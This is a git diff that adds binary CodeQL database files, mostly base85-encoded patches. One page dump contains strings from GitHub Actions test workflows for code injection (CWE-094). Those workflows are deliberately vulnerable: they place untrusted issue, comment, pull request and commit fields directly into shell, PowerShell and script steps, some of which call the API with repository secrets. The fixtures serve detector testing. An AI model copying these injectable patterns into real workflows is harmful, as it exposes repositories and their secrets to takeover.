z2VRA^)%<(0b#MeMQnVm${yg40eNB*`^m>@;KV?xb7S7yJ->;qoiy;2yVXWvOn9j+t zmLSP27H>y98&*Z!ChKzJ9hk=1qp`;KDf5ed&z=t~-@rXu^ear`%)98S{1c{g^`w_i z^@RDnxeI$O$uNTHzHc$U87u^QY71~v;gN9T%$sJ;Fx^Yov!G`kv+Ty*17Ywu#P^ol zFFy{8!6Fzlm*t!j&hNj;Jd%48*8uND&L4|~OPAX5el8HN9qhIWrfXBwR#HBT1?v@=1tF%=TO#5WXcG>GyFkXe+TrUNA0ejwa9Tlc8XbIzJ;u>ww zA@8+9&Il8+Ol+!1-w0Z^p<$38B942W$u4NVCuuv^8#ErybT`bb>wR= zyaA4zaCY-b98grJl)b9$T38$&h@6xb2oHw)YeWBp!nF6cPn*a^z|`lJ`lm&rVF_3_ zWm{bmOyj&i?pKrw)3uq}NgbIm?Mcfg!(4M<>cf>*m(_(ZjniS5ELsB7_%^BdzQp2D zM{`6gVe03efTa8fFx94VbRh3JEDIZ@8exKhW-W=mG$Cof& z8+GJR-8-22UwhebWDh(Veq~>TI9Y3EQNUSz_w}j zFx8wGWWqVXG?xJFKf=y1&G)5k^I3P8_FLfBJD)Z&m;XFz5(U$>_Z>{Qy)eB)x8Gi9 zn8|Vk*9BBxVs0HaMZFTH_vZJ-W2>IS)MvGgUoW=8)Mrj-zQsG3YH&IGOXL$w&r6BE zon|jgb6NG%M^ey{ci&eHx|}FX-`NVLY`LHYQ=KjyiZVvbIp$f~*6>ioa|6RJJF)oo z>wn%L#Q(+b0KWtL4)8m`?*P98{0{It!0!OR1N;u~JHYP%zXSXZ@H@co0KWtL4)8m` e?*P98{0{It!0!OR1N;u~JHYP%zXSizI`Ds=z%tSR literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/0/pageDump/page-000000000 b/db/db-yaml/default/pools/0/pageDump/page-000000000 new file mode 100644 index 000000000000..e8abb81542c7 --- /dev/null +++ b/db/db-yaml/default/pools/0/pageDump/page-000000000 
@@ -0,0 +1,55 @@ +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/Users/pwntester/src/github.com/githubsecuritylab/Users/pwntester/src/github.com/Users/pwntester/src/Users/pwntester/Users/nametag:yaml.org,2002:strIssue Workflowontag:yaml.org,2002:boolissuestypesopenededitedtag:yaml.org,2002:seq[opened, edited]tag:yaml.org,2002:maptypes: ... edited]issues:jobsredirectIssueruns-onubuntu-latestCheck for issue transferCheck f ... ransferenvcontent_analysis_responsecontent ... esponseundefinedcontent ... definedstepsusesactions/checkout@v2uses: a ... kout@v2Remove conflicting charsRemove ... g charsISSUE_TITLE${{github.event.issue.title}}${{gith ... title}}ISSUE_T ... title}}frabert/replace-string-action@1.2frabert ... ion@1.2idremove_quotationswithpattern""\""string${{env.ISSUE_TITLE}}replace-with-"-"pattern: "\""name: R ... g charsCheck infocheck-inforunecho "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV +|name: Check info- uses: ... kout@v2runs-on ... 
-latestredirectIssue:name: Issue Workflow/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.ymlCIpull_requestbranchesmain- mainbranches:pull_request:changed_filesTest changed-filesactions/checkout@v4fetch-depth0tag:yaml.org,2002:intfetch-depth: 0uses: a ... kout@v4Get changed fileschanged-filestj-actions/changed-files@v40tj-acti ... les@v40name: G ... d filesList all changed filesList al ... d filesfor file in ${{ steps.changed-files.outputs.all_changed_files }}; do + echo "$file was changed" +done +name: L ... d files- uses: ... kout@v4changed_files:name: CI/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.ymlissue_commentecho-chamberecho '${{ github.event.comment.body }}' +run: |- run: |echo-chamber2echo '${{ github.event.comment.body }}'echo '$ ... ody }}'run: ec ... ody }}'echo '${{ github.event.issue.body }}'echo '${{ github.event.issue.title }}'echo '$ ... tle }}'run: ec ... tle }}'- run: ... ody }}'echo-chamber3actions/github-script@v3actions ... ript@v3scriptconsole.log('${{ github.event.comment.body }}')console ... dy }}')script: ... dy }}')uses: a ... ript@v3console.log('${{ github.event.issue.body }}')console.log('${{ github.event.issue.title }}')console ... le }}')script: ... le }}')- uses: ... ript@v3echo-chamber:on: issue_comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml[opened,edited]permissions{}ISSUE_BODY${{github.event.issue.body}}${{gith ... .body}}outputsresult${{env.content_analysis_response}}${{env. ... ponse}}result: ... ponse}}Check Issue Titleactions-ecosystem/action-regex-match@v2actions ... 
atch@v2regex-matchtextregex^[A-Za-z0-9 _.]*$'^[A-Za-z0-9 _.]*$'flagsgtext: $ ... title}}name: C ... e TitleExit Jobif${{ steps.regex-match.outputs.match == '' }}${{ ste ... = '' }}echo "Bad Issue Title Format" +exit 1 +name: Exit Jobfrabert/replace-string-action@v2.5frabert ... on@v2.5'-'Check InformationISSUE_TITLE_PARSED${{steps.remove_quotations.outputs.replaced}}${{step ... laced}}ISSUE_T ... laced}}echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV +name: C ... rmationLabel issueenv.content_analysis_response != 'Valid'env.con ... 'Valid'curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels +name: Label issuename: C ... ransfercheckIssueInformationcheckIs ... rmationneeds.redirectIssue.outputs.result == 'Valid'needs.r ... 'Valid'Check for missing informationCheck f ... rmationneedsanalysis_responsegreetings_commentThank you for submitting the issue to us. We are sorry to see you get stuck with your workflow. While waiting for our team member to respond, please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information."Thank ... orry tocomment_introHello ${{ github.actor }}, thank you for submitting this issue! We are super excited that you want to help us make Dynamo all that it can be."Hello ... issue! needs_more_info_commentneeds_m ... commentHowever, we need some more information in order for the Dynamo team to investigate any further.\n\n"Howeve ... Dynamoclose_issue_commentHowever, given that there has been no additional information added, this issue will be closed for now. Please reopen and provide additional information if you wish the Dynamo team to investigate further.\n\n"Howeve ... 
added, info_neededAdditional information:\n - Filling in of the provided Template (What did you do, What did you expect to see, What did you see instead, What packages or external references (if any) were used)\n - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\n - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\n - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase said errors message in the screenshot)\n - Reproducible steps on how to create the error in question."Additi ... ion:\\nspecific_infoCan you please fill in the following to the best of your ability:"Can yo ... ility:"templateISSUE_TEMPLATE.md"ISSUE_TEMPLATE.md"issue_labelneeds more infoacceptable_missing_infoaccepta ... ng_info1analysi ... definedISSUE_B ... .body}}${{env.ISSUE_BODY}}${{ steps.remove_quotations.outputs.replaced }}${{ ste ... aced }}ISSUE_B ... aced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV +Close issueenv.analysis_response == 'Empty'env.ana ... 'Empty'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} +name: Close issueLabel and comment issueLabel a ... t issue((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened'))((env.a ... 
ened'))curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments +name: L ... t issueUnlabel updated issueUnlabel ... d issueenv.analysis_response == 'Valid' && github.event.action == 'edited'env.ana ... edited'echo urldecode ${{env.issue_label}} +curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') +name: U ... d issueGreetingsenv.analysis_response == 'Valid' && github.event.action == 'opened'env.ana ... opened'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments +name: Greetingsif: nee ... 'Valid'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.ymlIssue Type Predicterissue_type_Predicterparsed_issue_bodyissue_json_stringis_wish_listCheckout Dynamo Reponame: C ... mo RepoRemove Quotesremove_quotes${{ github.event.issue.body }}${{ git ... body }}ISSUE_B ... body }}${{ env.ISSUE_BODY }}${{ env ... BODY }}name: Remove QuotesAnalyze Issue Body${{ steps.remove_quotes.outputs.replaced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV +name: A ... ue BodyClean Issue Bodyenv.analysis_response == 'Valid'env.ana ... 'Valid'ISSUE_BODY_PARSEDecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV +name: C ... ue BodyCreate Issue JSON StringCreate ... StringISSUE_NUMBER${{ github.event.issue.number }}${{ git ... mber }}${{ github.event.issue.title }}${{ git ... 
itle }}ISSUE_N ... mber }}echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV +name: C ... StringCheckout IssuesTypePredicter RepoCheckou ... er ReporepositoryDynamoDS/IssuesTypePredicterDynamoD ... edicterpathIssuesTypePredicterreposit ... edictername: C ... er RepoSetup dotnetactions/setup-dotnet@v4actions ... tnet@v4dotnet-version3.1.0'3.1.0'dotnet- ... '3.1.0'name: Setup dotnetBuild Issues Type PredicterBuild I ... edicterdotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release +cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . +name: B ... edicterRun Issues Type PredicterRun Iss ... edicterecho "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV +name: R ... edicterLabel issue as 'Wishlist'Label i ... shlist'env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1')env.ana ... ist:1')GH_TOKEN${{ secrets.DYNAMO_ISSUES_TOKEN }}${{ sec ... OKEN }}GH_TOKE ... OKEN }}gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} +name: L ... shlist'Label issue as 'NotMLEvaluated'Label i ... luated'env.analysis_response != 'Valid' || env.issue_json_string == ''env.ana ... g == ''gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} +name: L ... luated'- name: ... mo Reponame: I ... edicterissue_t ... dicter:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.ymlCherry pickingpushmaster- masterpush:cherry_pickdestination_branchinvalid'invalid'auto_branchauto-${{github.event.after}}'auto-$ ... fter}}'user_nameDynamo-Bot"Dynamo-Bot"destina ... 
nvalid'checkoutactions/checkout@v3name: checkoutfrabert/replace-string-action@v1.2frabert ... on@v1.2${{github.event.commits[0].message}}${{gith ... ssage}}ISSUE_B ... laced}}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV +env.destination_branch != 'invalid'env.des ... nvalid'Create PR to branchgit config user.name "${{env.user_name}}" +git fetch --all +git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} +git cherry-pick -x ${{github.event.after}} --strategy-option theirs +git push -u origin ${{env.auto_branch}} +hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" +GITHUB_TOKEN${{secrets.DYNAMOBOTTOKEN}}${{secr ... TOKEN}}pr_messageCherry-Pick from commit: ${{github.event.after}} + +### Cherry-picking: +[Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) + +### Pull request: +${{ env.ISSUE_BODY_PARSED }} +GITHUB_ ... TOKEN}}if: env ... nvalid'- name: checkoutcherry_pick:name: Cherry picking/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.ymldiscussionecho '${{ github.event.discussion.title }}'echo '${{ github.event.discussion.body }}'- run: ... tle }}'on: discussion/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.ymldiscussion_commenton: dis ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.ymlgollumecho '${{ github.event.pages[1].title }}'echo '${{ github.event.pages[11].title }}'echo '${{ github.event.pages[0].page_name }}'echo '$ ... ame }}'run: ec ... ame }}'echo '${{ github.event.pages[2222].page_name }}'echo '${{ toJSON(github.event.pages.*.title) }}'echo '$ ... le) }}'run: ec ... 
# safeon: gollum/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.ymlImage URL Processingcreated[created]types: [created]issue_comment:process-image-urlcontains(github.event.comment.body, 'https://github.com/github/release-assets/assets/')contain ... sets/')Checkoutname: CheckoutExtract and Clean Initial URLExtract ... ial URLextract-urlBODY${{ github.event.comment.body }}BODY: $ ... body }}echo "::set-output name=initial_url::$BODY" +name: E ... ial URLGet Redirected URL with DebuggingGet Red ... buggingcurlINITIAL_URL${{ steps.extract-url.outputs.initial_url }}${{ ste ... _url }}INITIAL ... _url }}echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT +name: G ... buggingTrim URL after PNGtrim-urlREDIRECTED_URL${{ steps.curl.outputs.redirected_url }}REDIREC ... _url }}echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" +name: T ... ter PNGUpdate Comment with New URLUpdate ... New URLNEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" +name: U ... New URL- name: Checkoutprocess-image-url:name: I ... cessing/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.ymljob1job_output${{ steps.step.outputs.value }}${{ ste ... alue }}job_out ... alue }}sourceRemove foo from changed filesRemove ... d filesstepmad9000/actions-find-and-replace-string@3mad9000 ... tring@3${{ steps.source.outputs.all_changed_files }}${{ ste ... iles }}findfoo'foo'replace''source: ... iles }}name: R ... d filesjob2${{ always() }}sinkecho ${{needs.job1.outputs.job_output}}echo ${ ... utput}}id: sink- id: sinkjob1:on: push/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yamlglobal_envtestglobal_ ... itle }}job_envjob_env ... itle }}echo '${{ env.global_env }}'echo '$ ... 
env }}'run: ec ... env }}'echo '${{ env.test }}'echo '$ ... est }}'run: ec ... est }}'echo '${{ env.job_env }}'echo '${{ env.step_env }}'step_envstep_en ... itle }}env:on: issues/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.ymlCodeQL Auto Language"CodeQL ... nguage"[ main ]branches: [ main ]schedulecron17 19 * * 6'17 19 * * 6'cron: '17 19 * * 6'- cron: ... * * 6'create-matrixmatrix${{ steps.set-matrix.outputs.all_changed_files }}matrix: ... iles }}set-matrix- name: ... d filesanalyze${{ needs.create-matrix.outputs.matrix != '[]' }}${{ nee ... '[]' }}Analyzeactionsreadcontentssecurity-eventswriteactions: readstrategyfail-fastfalselanguage${{ fromJSON(needs.create-matrix.outputs.matrix) }}${{ fro ... rix) }}languag ... rix) }}fail-fast: falseCheckout repositoryname: C ... ository${{ matrix.language }} +| run: | - name: ... ositoryneeds: create-matrixcreate-matrix:name: " ... nguage"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.ymlsimple1${{ github.event.head_commit.message }}${{ git ... sage }}source: ... sage }}id: source no-stepecho "test=foo" >> "$GITHUB_OUTPUT"echo "t ... OUTPUT"id: no-stepecho "echo ${{steps.no-step.outputs.foo}}" +- id: source simple1:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.ymlfoobarfoo'foobarfoo'source: 'foobarfoo'for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" +done +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.ymlpull_request_reviewecho '${{ github.event.pull_request.title }}'echo '${{ github.event.pull_request.body }}'echo '${{ github.event.pull_request.head.label }}'echo '$ ... bel }}'run: ec ... 
bel }}'echo '${{ github.event.pull_request.head.repo.default_branch }}'echo '$ ... nch }}'run: ec ... nch }}'echo '${{ github.event.pull_request.head.repo.description }}'echo '$ ... ion }}'run: ec ... ion }}'echo '${{ github.event.pull_request.head.repo.homepage }}'echo '$ ... age }}'run: ec ... age }}'echo '${{ github.event.pull_request.head.ref }}'echo '$ ... ref }}'run: ec ... ref }}'echo '${{ github.event.review.body }}'on: pul ... _review/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.ymlpull_request_review_commentpull_re ... commenton: pul ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.ymlpull_request_targetrun: ec ... definedecho '${{ github.head_ref }}'- run: ... definedon: pul ... _target/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.ymlecho '${{ github.event.commits[11].message }}'echo '${{ github.event.commits[11].author.email }}'echo '$ ... ail }}'run: ec ... ail }}'echo '${{ github.event.commits[11].author.name }}'echo '${{ github.event.head_commit.message }}'echo '${{ github.event.head_commit.author.email }}'echo '${{ github.event.head_commit.author.name }}'echo '${{ github.event.head_commit.committer.email }}'echo '${{ github.event.head_commit.committer.name }}'echo '${{ github.event.commits[11].committer.email }}'echo '${{ github.event.commits[11].committer.name }}'- run: ... 
age }}'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.ymlsummaryid: summaryflowecho "${{steps.summary.outputs.value}}" +id: flow no-flowecho "${{steps.summary.outputs.foo}}" +id: no-flow- id: summary/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml[pull_r ... equest]for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" +done +/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml${{ steps.step2.outputs.test }}${{ ste ... test }}job_out ... test }}step0id: step0 step1${{ steps.step0.outputs.value}}${{ ste ... value}}BODY: $ ... value}}shellpowershellWrite-Output "::set-output name=MSG::$ENV{BODY}" +id: step1step2MSG${{steps.step1.outputs.MSG}}${{step ... s.MSG}}MSG: ${ ... s.MSG}}echo "test=$MSG" >> "$GITHUB_OUTPUT"id: step2run: ec ... utput}}- run: ... 
utput}}/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.ymlworkflow_runworkflows[test]workflows: [test]workflow_run:echo '${{ github.event.workflow_run.display_title }}'echo '${{ github.event.workflow_run.head_commit.message }}'echo '${{ github.event.workflow_run.head_commit.author.email }}'echo '${{ github.event.workflow_run.head_commit.author.name }}'echo '${{ github.event.workflow_run.head_commit.committer.email }}'echo '${{ github.event.workflow_run.head_commit.committer.name }}'echo '${{ github.event.workflow_run.head_branch }}'echo '${{ github.event.workflow_run.head_repository.description }}'on:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1'test'descriptionbrandingiconcoloricon: 'test'inputsrequireddefaultdescription: testtest:runsusingcomposite"composite"using: "composite"name: 'test'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2Hello World'Hello World'Greet someone and record the time'Greet ... e time'who-to-greetWho to greet'Who to greet'trueWorld'World'descrip ... greet'who-to- ... f inputtimeThe time we greeted you'The ti ... ed you'descrip ... ed you'time: # id of outputdocker'docker'imageDockerfile'Dockerfile'args${{ inputs.who-to-greet }}${{ inp ... reet }}- ${{ i ... reet }}using: 'docker'name: 'Hello World'hSt¹>w \ No newline at end of file 
diff --git a/db/db-yaml/default/pools/1/buckets/info b/db/db-yaml/default/pools/1/buckets/info new file mode 100644 index 0000000000000000000000000000000000000000..0111728636533e2c31d7b0489e64f46bcd4d6cf2 GIT binary patch literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/buckets/page-000000 b/db/db-yaml/default/pools/1/buckets/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/ids1/info b/db/db-yaml/default/pools/1/ids1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/indices1/info b/db/db-yaml/default/pools/1/indices1/info new file mode 100644 index 0000000000000000000000000000000000000000..799471fd4d54d409c98d3b7826deaac67913dc99 GIT binary patch literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/info b/db/db-yaml/default/pools/1/info new file mode 100644 index 0000000000000000000000000000000000000000..9b4ec24220f77cd70a002420d93e390bfc4c1f7a GIT binary patch literal 41 ccmZQz00U+q$+QN785kjAU>eL`E;&&F04bXS)Bpeg literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/1/metadata/info b/db/db-yaml/default/pools/1/metadata/info new file mode 100644 index 0000000000000000000000000000000000000000..9cdb710dfd9490f67f5103cbab69eb12829f96b4 GIT binary patch literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/pools/1/metadata/page-000000 b/db/db-yaml/default/pools/1/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa GIT binary patch literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/pools/1/pageDump/page-000000000 b/db/db-yaml/default/pools/1/pageDump/page-000000000 new file mode 100644 index 0000000000000000000000000000000000000000..7bccaeb20c898fd660036bab54ae98c20280d0a3 GIT binary patch literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U 
